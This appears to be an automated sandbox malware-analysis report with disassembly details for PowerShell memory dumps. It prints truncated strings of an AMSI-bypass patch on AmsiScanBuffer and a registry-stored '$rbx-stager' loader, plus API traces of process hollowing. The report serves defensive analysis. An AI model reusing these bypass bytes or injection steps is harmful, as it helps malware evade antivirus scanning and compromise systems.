                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCurrentWow64
                                                  • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                  • API String ID: 2666690646-646820343
                                                  • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                  • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                                                  • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                                                  • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00008000,75DB2EB0,00000000,00402238), ref: 004019F4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                                                  • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                                                    • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                    • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                    • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                  • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
                                                  • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
                                                  • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                                                  • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
                                                  • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                                                  • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                                                  • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                                                  • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
                                                  • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
                                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                                                  • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                                                  • HeapFree.KERNEL32(00000000), ref: 00401B93
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                                                  • HeapFree.KERNEL32(00000000), ref: 00401B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                  • String ID: '+'$'+[Char]($)+'
                                                  • API String ID: 3510167801-3465596256
                                                  • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                                  • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
                                                  • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                                                  • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 138 401659 CoUninitialize 136->138 137->138 139 401590-4015d5 VariantInit 137->139 138->135 141 4015d7-4015ec 139->141 142 40164d-401656 139->142 141->142 145 4015ee-401603 141->145 142->138 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                                                  APIs
                                                  • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                  • VariantInit.OLEAUT32(?), ref: 00401594
                                                  • VariantInit.OLEAUT32(?), ref: 00401609
                                                  • CoUninitialize.COMBASE ref: 00401659
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00401666
                                                  • SysFreeString.OLEAUT32(?), ref: 0040166B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                                                  • String ID: $rbx-svc32$$rbx-svc64
                                                  • API String ID: 2407135876-384997928
                                                  • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                  • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                                                  • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                  • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 401674-4016a1 SysAllocString * 2 CoInitializeEx 173 401782 172->173 174 4016a7-4016bb CoInitializeSecurity 172->174 177 401785-401797 SysFreeString * 2 173->177 175 4016c8-4016e4 CoCreateInstance 174->175 176 4016bd-4016c2 174->176 178 401777 175->178 179 4016ea-401732 VariantInit 175->179 176->175 176->178 180 40177a-401780 CoUninitialize 178->180 182 401734-40174a 179->182 183 401769 179->183 180->177 184 40176c-401775 182->184 186 40174c-401752 182->186 183->184 184->180 188 401757-401767 186->188 188->184
                                                  APIs
                                                  • SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                  • VariantInit.OLEAUT32(?), ref: 004016EE
                                                  • CoUninitialize.COMBASE ref: 0040177A
                                                  • SysFreeString.OLEAUT32(?), ref: 0040178C
                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID: $rbx-svc32
                                                  • API String ID: 4184240511-186198907
                                                  • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                  • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                                                  • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                                                  • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 193 401986-4019b1 lstrlenW call 40104b 196 4019b3-4019bd StrStrIW 193->196 197 4019dd-4019e0 193->197 196->197 198 4019bf 196->198 199 4019c0-4019da StrStrIW 198->199 199->199 200 4019dc 199->200 200->197
                                                  APIs
                                                  • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
                                                  • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                                                  • StrStrIW.SHLWAPI(?,Get-Delegate,75DB2EB0), ref: 004019D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: Get-Delegate
                                                  • API String ID: 1659193697-1365458365
                                                  • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                  • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                                                  • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                                                  • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 401798-40179e call 4017a5 ExitProcess
                                                  APIs
                                                    • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                    • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                    • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                    • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                    • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                    • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                  • ExitProcess.KERNEL32 ref: 0040179E
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                                                  • String ID:
                                                  • API String ID: 3836967525-0
                                                  • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                  • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                                                  • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 212 40118e-40119b GetModuleHandleA 213 4011aa-4011ac 212->213 214 40119d-4011a9 GetProcAddress 212->214
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000026.00000002.2037908571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_38_2_400000_powershell.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: RtlGetVersion$ntdll.dll
                                                  • API String ID: 1646373207-1489217083
                                                  • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                  • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                                                  • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                                                  • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

                                                  Execution Graph

                                                  Execution Coverage:12.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:13.2%
                                                  Total number of Nodes:159
                                                  Total number of Limit Nodes:10
                                                  execution_graph 5960 7ffaab79e1a2 5963 7ffaab79dd58 5960->5963 5962 7ffaab79e1aa 5964 7ffaab79e350 5963->5964 5965 7ffaab79e38a 5964->5965 6030 7ffaab79df28 5964->6030 5967 7ffaab79e58b 5965->5967 5990 7ffaab79df38 5965->5990 5967->5962 5969 7ffaab79e39b 5995 7ffaab79df48 5969->5995 5971 7ffaab79e3b0 5972 7ffaab79e582 5971->5972 6000 7ffaab79df58 5971->6000 6035 7ffaab79dfb8 5972->6035 5974 7ffaab79e58a 5974->5967 5976 7ffaab79e3f6 5976->5972 6005 7ffaab79df68 5976->6005 5978 7ffaab79e423 5979 7ffaab79e57a 5978->5979 6010 7ffaab79df78 5978->6010 5981 7ffaab79dfa8 NtUnmapViewOfSection 5979->5981 5981->5972 5982 7ffaab79e512 6025 7ffaab79dfa8 5982->6025 5984 7ffaab79e449 5984->5982 6015 7ffaab79df88 5984->6015 5986 7ffaab79e54e 6020 7ffaab79df98 5986->6020 5988 7ffaab79e55f 5988->5982 5989 7ffaab79df88 NtUnmapViewOfSection 5988->5989 5989->5982 5991 7ffaab79df41 5990->5991 5992 7ffaab79e04b 5991->5992 5993 7ffaab7a0ad0 NtUnmapViewOfSection 5991->5993 5992->5969 5994 7ffaab7a0b0a 5993->5994 5994->5969 5996 7ffaab79df51 5995->5996 5997 7ffaab79e04b 5996->5997 5998 7ffaab7a0ad0 NtUnmapViewOfSection 5996->5998 5997->5971 5999 7ffaab7a0b0a 5998->5999 5999->5971 6001 7ffaab79df5e 6000->6001 6002 7ffaab79e04b 6001->6002 6003 7ffaab7a0ad0 NtUnmapViewOfSection 6001->6003 6002->5976 6004 7ffaab7a0b0a 6003->6004 6004->5976 6007 7ffaab79df71 6005->6007 6006 7ffaab79e04b 6006->5978 6007->6006 6008 7ffaab7a0ad0 NtUnmapViewOfSection 6007->6008 6009 7ffaab7a0b0a 6008->6009 6009->5978 6012 7ffaab79df81 6010->6012 6011 7ffaab79e04b 6011->5984 6012->6011 6013 7ffaab7a0ad0 NtUnmapViewOfSection 6012->6013 6014 7ffaab7a0b0a 6013->6014 6014->5984 6016 7ffaab79df91 6015->6016 6017 7ffaab79e04b 6016->6017 6018 7ffaab7a0ad0 NtUnmapViewOfSection 6016->6018 6017->5986 6019 7ffaab7a0b0a 6018->6019 6019->5986 6022 7ffaab79dfa1 6020->6022 6021 7ffaab79e04b 6021->5988 6022->6021 6023 7ffaab7a0ad0 NtUnmapViewOfSection 6022->6023 6024 7ffaab7a0b0a 6023->6024 6024->5988 6027 7ffaab79dfb1 6025->6027 6026 7ffaab79e04b 6026->5979 6027->6026 6028 7ffaab7a0ad0 NtUnmapViewOfSection 6027->6028 6029 7ffaab7a0b0a 6028->6029 6029->5979 6032 7ffaab79df31 6030->6032 6031 7ffaab79e04b 6031->5965 6032->6031 6033 7ffaab7a0ad0 NtUnmapViewOfSection 6032->6033 6034 7ffaab7a0b0a 6033->6034 6034->5965 6037 7ffaab79dfc1 6035->6037 6036 7ffaab79e04b 6036->5974 6037->6036 6038 7ffaab7a0ad0 NtUnmapViewOfSection 6037->6038 6039 7ffaab7a0b0a 6038->6039 6039->5974 6100 7ffaab79df22 6101 7ffaab79df27 6100->6101 6102 7ffaab79e04b 6101->6102 6103 7ffaab7a0ad0 NtUnmapViewOfSection 6101->6103 6104 7ffaab7a0b0a 6103->6104 6040 7ffaab7a0fe4 6041 7ffaab7a0fed NtResumeThread 6040->6041 6043 7ffaab7a10a4 6041->6043 6044 7ffaab79ed66 6045 7ffaab79ed75 MapViewOfFile 6044->6045 6047 7ffaab79ee53 6045->6047 6048 7ffaab79fde9 6049 7ffaab79f6ba 6048->6049 6059 7ffaab79f8f4 6048->6059 6060 7ffaab79e078 6049->6060 6051 7ffaab79f73a 6051->6059 6064 7ffaab79e088 6051->6064 6053 7ffaab79f77b 6054 7ffaab79e088 NtUnmapViewOfSection 6053->6054 6053->6059 6055 7ffaab79f7ca 6054->6055 6055->6059 6068 7ffaab79e098 6055->6068 6057 7ffaab79f804 6057->6059 6072 7ffaab79e0a8 6057->6072 6061 7ffaab79e081 NtUnmapViewOfSection 6060->6061 6063 7ffaab7a0b0a 6061->6063 6063->6051 6065 7ffaab79e091 NtUnmapViewOfSection 6064->6065 6067 7ffaab7a0b0a 6065->6067 6067->6053 6069 7ffaab79e0a1 NtUnmapViewOfSection 6068->6069 6071 7ffaab7a0b0a 6069->6071 6071->6057 6073 7ffaab79e0af NtUnmapViewOfSection 6072->6073 6075 7ffaab7a0b0a 6073->6075 6075->6059 6105 7ffaab79e329 6106 7ffaab79e32f 6105->6106 6107 7ffaab79df28 NtUnmapViewOfSection 6106->6107 6108 7ffaab79e38a 6107->6108 6109 7ffaab79e58a 6108->6109 6110 7ffaab79df38 NtUnmapViewOfSection 6108->6110 6111 7ffaab79e39b 6110->6111 6112 7ffaab79df48 NtUnmapViewOfSection 6111->6112 6113 7ffaab79e3b0 6112->6113 6114 7ffaab79e582 6113->6114 6116 7ffaab79df58 NtUnmapViewOfSection 6113->6116 6115 7ffaab79dfb8 NtUnmapViewOfSection 6114->6115 6115->6109 6117 7ffaab79e3f6 6116->6117 6117->6114 6118 7ffaab79df68 NtUnmapViewOfSection 6117->6118 6119 7ffaab79e423 6118->6119 6120 7ffaab79e57a 6119->6120 6121 7ffaab79df78 NtUnmapViewOfSection 6119->6121 6122 7ffaab79dfa8 NtUnmapViewOfSection 6120->6122 6125 7ffaab79e449 6121->6125 6122->6114 6123 7ffaab79e512 6124 7ffaab79dfa8 NtUnmapViewOfSection 6123->6124 6124->6120 6125->6123 6126 7ffaab79df88 NtUnmapViewOfSection 6125->6126 6127 7ffaab79e54e 6126->6127 6128 7ffaab79df98 NtUnmapViewOfSection 6127->6128 6129 7ffaab79e55f 6128->6129 6129->6123 6130 7ffaab79df88 NtUnmapViewOfSection 6129->6130 6130->6123 6076 7ffaab79e7a8 6077 7ffaab79e7b1 K32GetModuleInformation 6076->6077 6079 7ffaab79e872 6077->6079 6080 7ffaab79eafa 6081 7ffaab79eb09 CreateFileMappingW 6080->6081 6083 7ffaab79ecb9 6081->6083 6084 7ffaab7a0c5d 6086 7ffaab7a0c6b NtWriteVirtualMemory 6084->6086 6087 7ffaab7a0d37 6086->6087 6131 7ffaab7a0a3e 6132 7ffaab7a0a4d NtUnmapViewOfSection 6131->6132 6134 7ffaab7a0b0a 6132->6134 6088 7ffaab7a0221 6089 7ffaab7a022f CreateProcessA 6088->6089 6091 7ffaab7a0950 6089->6091 6092 7ffaab7a0f20 6093 7ffaab7a0f2f NtSetContextThread 6092->6093 6095 7ffaab7a0fba 6093->6095 6135 7ffaab79f659 6136 7ffaab79f6ba 6135->6136 6137 7ffaab79e078 NtUnmapViewOfSection 6136->6137 6138 7ffaab79f73a 6137->6138 6139 7ffaab79e088 NtUnmapViewOfSection 6138->6139 6146 7ffaab79f8f4 6138->6146 6140 7ffaab79f77b 6139->6140 6141 7ffaab79e088 NtUnmapViewOfSection 6140->6141 6140->6146 6142 7ffaab79f7ca 6141->6142 6143 7ffaab79e098 NtUnmapViewOfSection 6142->6143 6142->6146 6144 7ffaab79f804 6143->6144 6145 7ffaab79e0a8 NtUnmapViewOfSection 6144->6145 6144->6146 6145->6146 6096 7ffaab79e8ac 6097 7ffaab79e8b5 CreateFileA 6096->6097 6099 7ffaab79ea4c 6097->6099

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 450 7ffaab79df98-7ffaab79e049 465 7ffaab79e04b-7ffaab79e069 450->465 466 7ffaab79e0af-7ffaab7a0b08 NtUnmapViewOfSection 450->466 472 7ffaab7a0b0a 466->472 473 7ffaab7a0b10-7ffaab7a0b2c 466->473 472->473
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 076bbe2a3c7c5129b88777b2def7277d29900da1a7c3d19aa5e2e67b313a0835
                                                  • Instruction ID: 1c303b953cde1e0908b07ca26f7a3c722c55e9b90a1aad38accb1877faf10adc
                                                  • Opcode Fuzzy Hash: 076bbe2a3c7c5129b88777b2def7277d29900da1a7c3d19aa5e2e67b313a0835
                                                  • Instruction Fuzzy Hash: B851096290E7848FDB56D76C98566E97FB1EF53210F0880FBD08DC70B3D958580D8791

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 483 7ffaab7a0c5d-7ffaab7a0c69 484 7ffaab7a0c74-7ffaab7a0ce8 483->484 485 7ffaab7a0c6b-7ffaab7a0c73 483->485 489 7ffaab7a0cf2-7ffaab7a0d35 NtWriteVirtualMemory 484->489 490 7ffaab7a0cea-7ffaab7a0cef 484->490 485->484 491 7ffaab7a0d37 489->491 492 7ffaab7a0d3d-7ffaab7a0d5a 489->492 490->489 491->492
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: a51bea2b4635ed32da4f28fd8793c31663c25614719ba6dc6d0beb5f34e1e767
                                                  • Instruction ID: 1e8fea4ce73b894171b53645f2b491f2217b62c6e8839445d8ca98a9c308754a
                                                  • Opcode Fuzzy Hash: a51bea2b4635ed32da4f28fd8793c31663c25614719ba6dc6d0beb5f34e1e767
                                                  • Instruction Fuzzy Hash: 6231937190CA488FDB58DF58D8456F9BBF1FB5A321F04426ED049D36A2CB70A816CB85

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 501 7ffaab79e078-7ffaab7a0b08 NtUnmapViewOfSection 512 7ffaab7a0b0a 501->512 513 7ffaab7a0b10-7ffaab7a0b2c 501->513 512->513
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: SectionUnmapView
                                                  • String ID:
                                                  • API String ID: 498011366-0
                                                  • Opcode ID: ef231625e78d40d587521f2dce4778e0b5cabb2737a2d8934b9fc2e1deff93d2
                                                  • Instruction ID: 1fc5732b0ecec2982d2fb5fc75941e98fb24153b265597976f91fb8f6a0884f5
                                                  • Opcode Fuzzy Hash: ef231625e78d40d587521f2dce4778e0b5cabb2737a2d8934b9fc2e1deff93d2
                                                  • Instruction Fuzzy Hash: 9431487190D7888FEB68DB5CD8097F97BF0EB56320F04816FD04DC31A6D6609849C792

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 514 7ffaab7a0a3e-7ffaab7a0a4b 515 7ffaab7a0a56-7ffaab7a0b08 NtUnmapViewOfSection 514->515 516 7ffaab7a0a4d-7ffaab7a0a55 514->516 520 7ffaab7a0b0a 515->520 521 7ffaab7a0b10-7ffaab7a0b2c 515->521 516->515 520->521
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: SectionUnmapView
                                                  • String ID:
                                                  • API String ID: 498011366-0
                                                  • Opcode ID: 0bb2c964556ef0f1cee3826845efe800da0278a2a6197e2eef40c06da5c7cab4
                                                  • Instruction ID: fcc5aa9193c3dfeb98415bad49c8dcf90f89c5df70bcec0cdc4d9404feb053a8
                                                  • Opcode Fuzzy Hash: 0bb2c964556ef0f1cee3826845efe800da0278a2a6197e2eef40c06da5c7cab4
                                                  • Instruction Fuzzy Hash: 9831E53090D6888FDB59DF68C846BA97FF0EF56320F0442AFD049C71A3D664A446CB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 522 7ffaab7a0fe4-7ffaab7a0feb 523 7ffaab7a0ff6-7ffaab7a10a2 NtResumeThread 522->523 524 7ffaab7a0fed-7ffaab7a0ff5 522->524 528 7ffaab7a10a4 523->528 529 7ffaab7a10aa-7ffaab7a10c6 523->529 524->523 528->529
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 687d12e50f75011774f041532e490ae434a8370af38379737070e839e1bd0c8e
                                                  • Instruction ID: bfca7b8923f16534e3a6f370c7ad8dd3000883acac45d599e492df60a4d1d48c
                                                  • Opcode Fuzzy Hash: 687d12e50f75011774f041532e490ae434a8370af38379737070e839e1bd0c8e
                                                  • Instruction Fuzzy Hash: 7F31D57190C64C8FDB58DF9CD8457EABBF1EB56311F04416BD009D3252CB70A806CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 530 7ffaab7a0f20-7ffaab7a0fb8 NtSetContextThread 534 7ffaab7a0fba 530->534 535 7ffaab7a0fc0-7ffaab7a0fdc 530->535 534->535
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000027.00000002.2300660193.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_39_2_7ffaab790000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 7c4971a3d42159cd201bd0534eea0ce697d3a0cb19d2b28e70000dcc338d40aa
                                                  • Instruction ID: ebebf87e8a9053cddfea8a7ebe02ab7b6940ed2d1204e396ad2678f5a5bf7c24
                                                  • Opcode Fuzzy Hash: 7c4971a3d42159cd201bd0534eea0ce697d3a0cb19d2b28e70000dcc338d40aa
                                                  • Instruction Fuzzy Hash: 9F21913190CA4C8FDB58EF58D8467E97BF0EB5A321F04416FD04DD3262CA74A846CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
